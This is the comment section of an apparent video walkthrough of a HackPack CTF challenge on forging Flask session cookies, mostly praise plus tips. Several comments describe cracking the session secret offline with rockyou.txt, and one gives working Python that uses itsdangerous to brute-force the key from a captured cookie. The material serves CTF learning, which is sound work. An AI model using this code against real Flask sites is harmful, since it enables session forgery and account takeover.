HackPack CTF - Forging Python Flask Session Cookies

Comments
Author

Just a small comment: you could just offline brute force the secret key using the original session cookie you get from the site and compare it to what you generate. This way you don't need to brute force the remote server, and it will make brute forcing faster (because it's not over the network).
Aside from that, great video as always, thanks a lot for what you are doing for the community, you are awesome!

sysclls
Author

I’m learning so much from this channel. Thanks so much.

-willplaysgames
Author

You make me wanna go learn Python so hard right now after seeing the power of this programming language.

mostafanasser
Author

Wonderful video, thanks. This walkthrough helped me to solve the picoCTF "more cookies" challenge, which is based on Flask cookies...

viv_
Author

Also, we can observe the header values, server: meinheld/1.0.1, so we can deduce that certainly at the backend a sandboxed Python backend must be at work; this could be a Python sandbox vulnerability or SSTI.

IAmOxidised
Author

This is awesome. I like the way you get going with things and find out the right path. I like your Python skills, man. I do love Python but I am merely a beginner. Keep doing such videos. Thank you very much 😊

crassProgrammer
Author

Very new to pretty much all of this ... it seems to slowly make sense. Very fun to watch and informative 👍

tricky
Author

I really loved your videos.. it's worth watching.. kudos to your programming skills.. keep doing more.. keep entertaining and encouraging us.. Love from INDIA

manoharbaratam
Author

I just discovered you some days ago and I love your content. It's not the area I work, but who knows in future? Anyway, knowledge is knowledge, right? Keep up the good work.

arcanj
Author

I thought for sure this was going to be a situation where they don't verify the signature, so you could just set the flagship key to true in Burp and be on your way. But it was great seeing your python script!

wilcosec
Author

You could have verified the signature offline, only the correct secret will generate a valid signature.

Vogel
Author

Any possibility of going over how to complete this without brute force? I'd be very interested in seeing that :)

Also, yeah, a lot of people have mentioned it already, but offline hash verification probably would've been cleaner. Overall, great vid. Love your content.

kalelsoffspring
Author

I thought you said there was no brute forcing? Did I mishear?

GeekBatman
Author

I did those picoCTF Flask ones. You don't actually need to send it to the server over and over again. Because you have a cookie, you can just take the data out of the cookie, then sign it with all of the rockyou passwords, and check to see if the token you get from signing it is equal to the token the website gave you. Once you have the secret key that way, then you can forge a different one and send only one request back to the server.

It's still brute-forcing, but you don't need to hammer the server. Also it's like a million times faster to do it locally. If the password had been the 10 millionth one in rockyou.txt, hammering the server would take too long.

Am I explaining that clearly?

lordtony
Author

Nice. I wasn't able to do it. Now I know how to do it :)

daanbreur
Author

How in the hell did you learn all this stuff? Just WOW. Very impressive. I feel dumb, just watching. lol

CybrJames
Author

Any websites like THM, HTB and HackPack CTF? thx.

passivecryptoearnings
Author

Is it possible to solve those challenges today? Or has the competition ended and they are no longer available?

Andrei-dsqv
Author

You can brute force it locally by doing this:

from itsdangerous import Signer
import hashlib

# Paste the session cookie you got from the site here (placeholder).
# A Flask session cookie looks like <payload>.<timestamp>.<signature>;
# everything before the last "." is the part that gets signed.
cookie = "PASTE_SESSION_COOKIE_HERE"
encoded_plus_timestamp, wanted_signature = cookie.rsplit(".", 1)

# Load rockyou.txt and try each line as the secret key
with open("rockyou.txt", encoding="latin-1") as rockyou:
    for line in rockyou:
        password = line.rstrip("\n")
        # Flask's session signer parameters; found them through some source digging :)
        s = Signer(password, salt="cookie-session", key_derivation="hmac", digest_method=hashlib.sha1)
        if s.get_signature(encoded_plus_timestamp.encode()) == wanted_signature.encode():
            print(f"Secret key is: {password}!")
            break

This is much faster and there is no need to hammer the server :)

_sp
Author

Great vid, but for the love of God please choose either single or double quotes

theohenson